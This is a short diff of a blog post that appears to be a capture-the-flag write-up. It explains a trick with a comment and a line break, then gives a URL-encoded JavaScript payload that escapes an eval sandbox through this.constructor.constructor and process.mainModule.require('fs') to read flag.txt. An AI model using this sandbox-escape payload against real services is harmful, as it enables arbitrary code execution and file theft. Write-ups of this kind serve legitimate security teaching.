mtiennnnn/jekyll-TeXt-theme/_posts/2022-05-21-angstromcaasio.md

 WHAT, it didn't work but at least we have a little sparkle.
 It done parsed the regex into string, but it didn't evaluate because it wasn't a valid expression.

-Now let me do a trick, I just add another forward slashes at the first and the end of the payload again to comment it out, then use a line break to seperate the command, so we'll have our payload works like a charm:
+Now let me do a trick, I just add another forward slashes at the first and the end of the payload again to comment it out, then use a line break to seperate the command, so we'll have our payload worked like a charm:

 ```js
 eval(decodeURIComponent(/%2F%0Athis%2Econstructor%2Econstructor(%22return%20this%2Eprocess%2EmainModule%2Erequire(%27fs%27)%2EreadFileSync(%27flag%2Etxt%27)%22)()%2F/))